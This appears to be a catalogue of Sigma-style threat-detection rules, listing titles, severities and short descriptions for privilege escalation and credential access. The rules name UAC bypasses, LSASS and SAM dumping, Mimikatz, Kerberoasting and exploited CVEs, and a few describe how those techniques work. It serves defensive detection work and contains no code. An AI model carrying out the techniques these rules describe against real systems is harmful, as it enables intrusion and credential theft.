UAC Bypass Using Windows Media Player - ProcesshighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Bypass UAC via WSReset.exehighDetects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
UAC Bypass WSResethighDetects the pattern of UAC Bypass via WSReset usable by default sysmon-config
Suspicious Child Process Of Wermgr.EXEhighDetects suspicious Windows Error Reporting manager (wermgr.exe) child process
Whoami.EXE Execution From Privileged ProcesshighDetects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
Security Privileges Enumeration Via Whoami.EXEhighDetects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
Suspicious Processes Spawned by WinRMhighDetects suspicious processes including shells spawned from WinRM host process
WMI Persistence - Script Event ConsumermediumDetects WMI script event consumers
Potential Process Hollowing ActivitymediumDetects when a memory process image does not match the disk image, indicative of process hollowing.
UAC Bypass Via WsresethighUnfixed UAC bypass method in Windows 10. WSReset.exe is a file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
Path To Screensaver Binary ModifiedmediumDetects value modification of registry key containing path to binary used as screensaver.
Shell Open Registry Keys ManipulationhighDetects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
Sticky Key Like Backdoor Usage - RegistrycriticalDetects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Bypass UAC Using DelegateExecutehighBypasses User Account Control using a fileless method
Bypass UAC Using SilentCleanup TaskhighDetects the setting of the environment variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
Potential CobaltStrike Service Installations - RegistryhighDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
COM Hijack via SdclthighDetects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
Enabling COR Profiler Environment VariablesmediumDetects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
Potential Persistence Via GlobalFlagshighDetects registry persistence technique using the GlobalFlags and SilentProcessExit keys
ServiceDll HijackmediumDetects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.
Suspicious Printer Driver Empty ManufacturerhighDetects a suspicious printer driver installation with an empty Manufacturer value
Modify User Shell Folders Startup ValuehighDetects modification of the startup key to a path where a payload could be stored to be launched during startup
New TimeProviders Registered With Uncommon DLL NamehighDetects processes setting a new DLL in DllName under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.
UAC Bypass via Event ViewerhighDetects UAC bypass method using Windows event viewer
UAC Bypass via SdclthighDetects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
UAC Bypass Abusing Winsat Path Parsing - RegistryhighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - RegistryhighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
UAC DisabledmediumDetects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
UAC Notification DisabledmediumDetects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
UAC Secure Desktop Prompt DisabledmediumDetects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
Malware Shellcode in Verclsid Target ProcesshighDetects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
Potential BearLPE ExploitationhighDetects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write
Exploiting SetupComplete.cmd CVE-2019-1378highDetects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
Exploiting CVE-2019-1388criticalDetects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
Potential Dridex ActivitycriticalDetects potential Dridex activity via specific process patterns
Antivirus PrinterNightmare CVE-2021-34527 Exploit DetectioncriticalDetects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675.
CVE-2021-1675 Print Spooler Exploitation Filename PatterncriticalDetects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
InstallerFileTakeOver LPE CVE-2021-41379 File Create EventcriticalDetects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
Potential CVE-2021-41379 Exploitation AttemptcriticalDetects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
Suspicious RazerInstaller Explorer SubprocesshighDetects an explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
Potential SystemNightmare Exploitation AttemptcriticalDetects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
Moriya Rootkit File CreatedcriticalDetects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
APT PRIVATELOG Image Load PatternhighDetects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
SOURGUM Actor BehaviourshighSuspicious behaviours related to an actor tracked by Microsoft as SOURGUM
Potential CVE-2023-21554 QueueJumper ExploitationhighDetects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
CVE-2022-24527 Microsoft Connected Cache LPEhighDetects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
Suspicious Sysmon as Execution ParenthighDetects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
Exploitation Indicators Of CVE-2023-20198highDetects exploitation indicators of CVE-2023-20198, a privilege escalation vulnerability in Cisco IOS XE Software Web UI.
Diamond Sleet APT Scheduled Task CreationcriticalDetects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
Lazarus APT DLL Sideloading ActivityhighDetects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command InjectionhighDetects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
Kapeka Backdoor Scheduled Task CreationhighDetects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc.
Potential Raspberry Robin Aclui Dll SideLoadinghighDetects potential sideloading of malicious "aclui.dll" by OleView. This behavior was observed in Raspberry-Robin variants reported by Check Point Research in February 2024.
Privilege Role Elevation Not Occurring on SAW or PAWhighDetects failed sign-in from a PAW or SAW device
Potential Zerologon (CVE-2020-1472) ExploitationhighDetects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472)
Scheduled Task DeletionlowDetects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
Potential Remote WMI ActiveScriptEventConsumers ActivitymediumDetects potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
Scheduled Task Created - FileCreationlowDetects the creation of a scheduled task via file creation.
Potential Shellcode InjectionmediumDetects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
Elevated System Shell SpawnedmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
Scheduled Task Created - RegistrylowDetects the creation of a scheduled task via Registry keys.
AWS Lambda Function Created or InvokedlowDetects when a user creates or invokes a lambda function.
CVE-2021-3156 Exploitation AttempthighDetects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing required to trigger the heap-based buffer overflow.
CVE-2021-3156 Exploitation Attempt BruteforcinghighDetects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing required to trigger the heap-based buffer overflow.
Potential CVE-2021-4034 Exploitation AttempthighDetects exploitation attempt of the vulnerability described in CVE-2021-4034.
OMIGOD SCX RunAsProvider ExecuteScripthighRule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Meterpreter or Cobalt Strike Getsystem Service InstallationcriticalDetects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
MSI Spawned Cmd and Powershell Spawned ProcesseshighThis rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes
Always Install Elevated Parent Child CorrelatedhighThis rule looks for any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege
Windows Kernel and 3rd-Party Drivers Exploits Token StealinghighDetection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level
Malicious Service InstallationscriticalDetects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
Detection of Possible Rotten PotatohighDetection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges
Rare Schtasks CreationslowDetects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
Password Spraying via Explicit CredentialsmediumDetects a single user failing to authenticate to multiple users using explicit credentials.
Multiple Users Failing to Authenticate from Single ProcessmediumDetects failed logins with multiple accounts from a single process on the system.
Failed Logins with Different Accounts from Single Source SystemmediumDetects suspicious failed logins with different user accounts from a single source system
Failed NTLM Logins with Different Accounts from Single Source SystemmediumDetects suspicious failed logins with different user accounts from a single source system
Valid Users Failing to Authenticate From Single Source Using KerberosmediumDetects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.
Disabled Users Failing To Authenticate From Source Using KerberosmediumDetects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.
Invalid Users Failing To Authenticate From Source Using KerberosmediumDetects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.
Valid Users Failing to Authenticate from Single Source Using NTLMmediumDetects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.
Invalid Users Failing To Authenticate From Single Source Using NTLMmediumDetects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.
Multiple Users Remotely Failing To Authenticate From Single SourcemediumDetects a source system failing to authenticate against a remote host with multiple users.
Rare Service InstallationslowDetects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
attack.credential_access 342
Title Level Description
Brute ForcemediumDetects many authentication failures from one source to one destination which may indicate Brute Force activity
iOS Implant URL PatterncriticalDetects URL pattern used by iOS Implant
Credential Dumping Tools Service ExecutioncriticalDetects well-known credential dumping tools execution via service execution events
Suspicious File Event With Teams ObjectshighDetects an access to authentication tokens and accounts of Microsoft Teams desktop application.
Suspicious Unattend.xml File AccessmediumAttempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended Windows install process
CrackMapExec File Creation PatternshighDetects suspicious file creation patterns found in logs when CrackMapExec is used
LSASS Memory Dump File CreationhighLSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified
CreateMiniDump HacktoolhighDetects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
Mimikatz MemSSP Default Log File CreationcriticalDetects Mimikatz MemSSP default log file creation
Accessing Encrypted Credentials from Google Chrome Login DatabasemediumAdversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Credential Dumping by LaZagnecriticalDetects LSASS process access by LaZagne for credential dumping.
Credential Dumping Tools Accessing LSASS MemoryhighDetects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools
Credential Dumping by PypykatzcriticalDetects LSASS process access by pypykatz for credential dumping.
CrackMapExecWincriticalDetects CrackMapExecWin Activity as Described by NCSC
GALLIUM ArtefactshighDetects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
Credential Acquisition via Registry Hive DumpinghighDetects Credential Acquisition via Registry Hive Dumping
Registry Dump of SAM Creds and SecretshighAdversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored
Accessing WinAPI in PowerShell for Credentials DumpinghighDetects access to lsass.exe by PowerShell
Mimikatz Detection LSASS AccesshighDetects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_INFORMATION "only old versions", 0x0010 PROCESS_VM_READ)
Activity Related to NTDS.dit Domain Hash RetrievalhighDetects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely
SAM Dump to AppDatahighDetects suspicious SAM dump activity as caused by QuarksPwDump and other password dumpers
Kubernetes Admission Controller ModificationmediumDetects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
Kubernetes Secrets Modified or DeletedmediumDetects when Kubernetes Secrets are Modified or Deleted.
OpenCanary - MSSQL Login Attempt Via SQLAuthhighDetects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.
OpenCanary - MSSQL Login Attempt Via Windows AuthenticationhighDetects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.
OpenCanary - MySQL Login AttempthighDetects instances where a MySQL service on an OpenCanary node has had a login attempt.
OpenCanary - REDIS Action Command AttempthighDetects instances where a REDIS service on an OpenCanary node has had an action command attempted.
Antivirus Password Dumper DetectioncriticalDetects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
AWS Route 53 Domain Transfer Lock DisabledlowDetects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.
AWS Route 53 Domain Transferred to Another AccountlowDetects when a request has been made to transfer a Route 53 domain to another AWS account.
Azure Keyvault Key Modified or DeletedmediumIdentifies when a Keyvault Key is modified or deleted in Azure.
Azure Key Vault Modified or DeletedmediumIdentifies when a key vault is modified or deleted.
Azure Keyvault Secrets Modified or DeletedmediumIdentifies when secrets are modified or deleted in Azure.
Azure Kubernetes Admission ControllermediumIdentifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
Azure Kubernetes Network Policy ChangemediumIdentifies when a Azure Kubernetes network policy is modified or deleted.
Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and DeletedmediumDetects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.
Application AppID Uri Configuration ChangeshighDetects when a configuration change is made to an applications AppID URI.
Delegated Permissions Granted For All UsershighDetects when highly privileged delegated permissions are granted on behalf of all users
End User ConsentlowDetects when an end user consents to an application
End User Consent BlockedmediumDetects when end user consent is blocked due to risk-based consent.
Added Owner To ApplicationmediumDetects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.
App Granted Microsoft PermissionshighDetects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD
Application URI Configuration ChangeshighDetects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
Change to Authentication MethodmediumChange to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
Multi Factor Authentication Disabled For User AccountmediumDetects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled". Threat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.
Password Reset By User AccountmediumDetect when a user has reset their password in Azure AD
Anomalous TokenhighIndicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.
Anonymous IP AddresshighIndicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.
Password Spray ActivityhighIndicates that a password spray attack has been successfully performed.
Primary Refresh Token Access AttempthighIndicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft
SAML Token Issuer AnomalyhighIndicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns
Account LockoutmediumIdentifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.
Successful Authentications From Countries You Do Not Operate Out OfmediumDetect successful authentications from countries you do not operate out of.
Failed Authentications From Countries You Do Not Operate Out OflowDetect failed authentications from countries you do not operate out of.
Azure AD Only Single Factor Authentication RequiredlowDetect when users are authenticating without MFA being required.
Potential MFA Bypass Using Legacy Client AuthenticationhighDetects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.
Sign-in Failure Due to Conditional Access Requirements Not MethighDefine a baseline threshold for failed sign-ins due to Conditional Access failures
Use of Legacy Authentication ProtocolshighAlert on when legacy authentication has been used on an account
Multifactor Authentication DeniedmediumUser has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.
Multifactor Authentication InterruptedmediumIdentifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
User Access Blocked by Azure Conditional AccessmediumDetect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.
Bitbucket User Login FailuremediumDetects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
Cisco Duo Successful MFA Authentication Via Bypass CodemediumDetects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.
Google Cloud Kubernetes Admission ControllermediumIdentifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
Google Cloud Kubernetes RoleBindingmediumDetects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.
Google Cloud Kubernetes Secrets Modified or DeletedmediumIdentifies when the Secrets are Modified or Deleted.
Github High Risk Configuration DisabledhighDetects when a user disables a critical security feature for an organization.
Okta Admin Functions Access Through ProxymediumDetects access to Okta admin functions through proxy.
Okta MFA Reset or DeactivatedmediumDetects when an attempt at deactivating or resetting MFA.
Potential Okta Password in AlternateID FieldhighDetects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.
New Okta User CreatedinformationalDetects new user account creation
Cleartext Protocol Usage Via NetflowlowEnsure that all account usernames and authentication credentials are transmitted across networks using encrypted channels Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.
Credentials In Files - LinuxhighDetecting attempts to extract passwords with grep
Linux Keylogging with Pam.dhighDetect attempt to enable auditing of TTY input
Network Sniffing - LinuxlowNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Suspicious History File Operations - LinuxmediumDetects commandline operations on shell history files
Guacamole Two Users Sharing Session AnomalyhighDetects suspicious session with two users present
Copy Passwd Or Shadow From TMP PathhighDetects when the file "passwd" or "shadow" is copied from tmp path
Mount Execution With Hidepid ParametermediumDetects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
Linux Recon IndicatorshighDetects events with patterns found in commands used for reconnaissance on linux systems
Credentials from Password Stores - KeychainmediumDetects passwords dumps from Keychain
Credentials In FileshighDetecting attempts to extract passwords with grep and laZagne
GUI Input Capture - macOSlowDetects attempts to use system dialog prompts to capture user credentials
Network Sniffing - MacOsinformationalDetects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Suspicious History File OperationsmediumDetects commandline operations on shell history files
Cisco Collect DatalowCollect pertinent data from the configuration files
Cisco Crypto CommandshighShow when private keys are being exported from the device, or when new certificates are installed
Cisco Show Commands InputmediumSee what commands are being input into the device by other people, full credentials can be in the history
Cisco SniffingmediumShow when a monitor or a span/rspan is setup or modified
Cisco BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing
Cisco LDP Authentication FailureslowDetects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
Cleartext Protocol UsagelowEnsure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.
Huawei BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5lowDetects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
Possible Impacket SecretDump Remote Activity - ZeekhighDetect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml
Transferring Files with Credential Data via Network Shares - ZeekmediumTransferring files with well-known filenames (sensitive files with credential data) using network shares
Kerberos Network Traffic RC4 Ticket EncryptionmediumDetects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting
Suspicious Network Communication With IPFSlowDetects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.
Hack Tool User AgenthighDetects suspicious user agent strings user by hack tools in proxy logs
Mimikatz UsehighThis method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
Potential Credential Dumping Via WER - ApplicationhighDetects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential
Ntdsutil AbusemediumDetects potential abuse of ntdsutil to dump ntds.dit database
Audit CVE EventcriticalDetects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
MSSQL Server Failed LogonlowDetects failed logon attempts from clients to MSSQL server.
MSSQL Server Failed Logon From External NetworkmediumDetects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.
Certificate Private Key AcquiredmediumDetects when an application acquires a certificate private key
Certificate Exported From Local Certificate StoremediumDetects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.
Standard User In High Privileged GroupmediumDetect standard users login that are part of high privileged groups such as the Administrator group
NTLM Brute ForcemediumDetects common NTLM brute force device names
ADCS Certificate Template Configuration VulnerabilitylowDetects certificate creation with template allowing risk permission subject
ADCS Certificate Template Configuration Vulnerability with Risky EKUhighDetects certificate creation with template allowing risk permission subject and risky EKU
Active Directory Replication from Non Machine AccountcriticalDetects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.
Mimikatz DC SynchighDetects Mimikatz DC sync security events
DPAPI Domain Backup Key ExtractionhighDetects tools extracting LSA secret DPAPI domain backup key from Domain Controllers
DPAPI Domain Master Key Backup AttemptmediumDetects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.
Possible Impacket SecretDump Remote ActivityhighDetect AD credential dumping using impacket secretdump HKTL
Kerberoasting Activity - Initial QuerymediumThis rule will collect the data needed to start looking into possible kerberoasting activity. Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds. You can then set a threshold for the number of requests and time between the requests to turn this into an alert.
LSASS Access From Non System AccountmediumDetects potential mimikatz-like tools accessing LSASS from non system account
Credential Dumping Tools Service Execution - SecurityhighDetects well-known credential dumping tools execution via service execution events
WCE wceaux.dll AccesscriticalDetects wceaux.dll access while WCE pass-the-hash remote command execution on source host
Windows Pcap DriversmediumDetects Windows Pcap driver installation based on a list of associated .sys files.
Possible PetitPotam Coerce Authentication AttempthighDetect PetitPotam coerced authentication activity.
PetitPotam Suspicious Kerberos TGT RequesthighDetect suspicious Kerberos TGT requests. Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.
Possible DC Shadow AttackmediumDetects DCShadow via create new SPN
Register new Logon Process by RubeushighDetects potential use of Rubeus via registered new trusted logon process
Replay Attack DetectedhighDetects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client
SAM Registry Hive Handle RequesthighDetects handles requested to SAM registry hive
Kerberos ManipulationhighDetects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.
Password Dumper Activity on LSASShighDetects process handle on LSASS process with certain access mask and object type SAM_DOMAIN
Potentially Suspicious AccessMask Requested From LSASSmediumDetects process handle on LSASS process with certain access mask
Possible Shadow Credentials AddedhighDetects possible addition of shadow credentials to an active directory object.
Suspicious Kerberos RC4 Ticket EncryptionmediumDetects service ticket requests using RC4 encryption type
Suspicious Teams Application Related ObjectAcess EventhighDetects an access to authentication tokens and accounts of Microsoft Teams desktop application.
Transferring Files with Credential Data via Network SharesmediumTransferring files with well-known filenames (sensitive files with credential data) using network shares
VSSAudit Security Event Source RegistrationinformationalDetects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.
External Remote RDP Logon from Public IPmediumDetects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.
External Remote SMB Logon from Public IPhighDetects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
Potential Privilege Escalation via Local Kerberos Relay over LDAPhighDetects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.
RottenPotato Like Attack PatternhighDetects logon events that have characteristics of events generated during an attack with RottenPotato and the like
Suspicious Rejected SMB Guest Logon From IPmediumDetect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service
Active Directory Certificate Services Denied Certificate Enrollment RequestlowDetects denied requests by Active Directory Certificate Services. Example of these requests denial include issues with permissions on the certificate template or invalid signatures.
Potential CVE-2021-42287 Exploitation AttemptmediumThe attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
No Suitable Encryption Key Found For Generating Kerberos TicketlowDetects errors when a target server doesn't have suitable keys for generating kerberos tickets. This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.
Critical Hive In Suspicious Location Access Bits ClearedhighDetects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.
Volume Shadow Copy MountlowDetects volume shadow copy mount via Windows event log
Credential Dumping Tools Service Execution - SystemhighDetects well-known credential dumping tools execution via service execution events
LSASS Access Detected via Attack Surface ReductionhighDetects Access to LSASS Process
Remote Thread Created In KeePass.EXEhighDetects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity
